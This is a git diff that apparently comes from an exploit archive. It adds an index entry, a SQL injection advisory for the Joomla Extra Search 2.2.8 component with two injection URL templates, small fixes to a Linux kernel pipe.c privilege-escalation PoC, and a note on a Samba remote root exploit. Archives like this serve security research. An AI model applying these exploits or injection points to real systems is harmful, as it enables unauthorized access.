diff --git a/files.csv b/files.csv index fc43c2c54..16ef162cc 100644 --- a/files.csv +++ b/files.csv @@ -37573,3 +37573,4 @@ id,file,description,date,author,platform,type,port 41642,platforms/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' Parameter SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps,0 41644,platforms/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",php,webapps,80 41662,platforms/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",hardware,webapps,0 +41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/linux/local/9844.py b/platforms/linux/local/9844.py index ef499aefe..efce5b4ac 100755 --- a/platforms/linux/local/9844.py +++ b/platforms/linux/local/9844.py @@ -2,11 +2,15 @@ # Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability # PoC by Matthew Bergin # Bugtraq ID: 36901 +# +# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/82/files import os import time import random #infinite loop +i = 0 +x = 0 while (i == 0): os.system("sleep 1") while (x == 0): @@ -14,7 +18,7 @@ while (i == 0): pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }")) if (pid == 0): #need an active pid, race condition applies print "[+] Didnt grab PID, got: " + pid + " -- Retrying..." - return + break else: print "[+] PID: " + pid loc = "echo n > /proc/" + pid + "/fd/1" diff --git a/platforms/php/webapps/41663.txt b/platforms/php/webapps/41663.txt new file mode 100755 index 000000000..d22ee72cf --- /dev/null +++ b/platforms/php/webapps/41663.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Extra Search v2.2.8 - SQL Injection +# Google Dork: N/A +# Date: 21.03.2017 +# Vendor Homepage: http://www.joomlaboat.com/ +# Software: http://www.joomlaboat.com/extra-search +# Demo: http://www.joomlaboat.com/ +# Version: 2.2.8 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_extrasearch&view=details&listing_id=1&establename=[SQL] +# http://localhost/[PATH]/index.php?option=com_extrasearch&controller=createusers&establename=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/unix/remote/22469.c b/platforms/unix/remote/22469.c index e136a95fa..0c3a663ec 100755 --- a/platforms/unix/remote/22469.c +++ b/platforms/unix/remote/22469.c @@ -6,6 +6,8 @@ A buffer overflow vulnerability has been reported for Samba. The problem occurs Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process. It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. + +E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/78/files */ /* 0x333hate => samba 2.2.x remote root exploit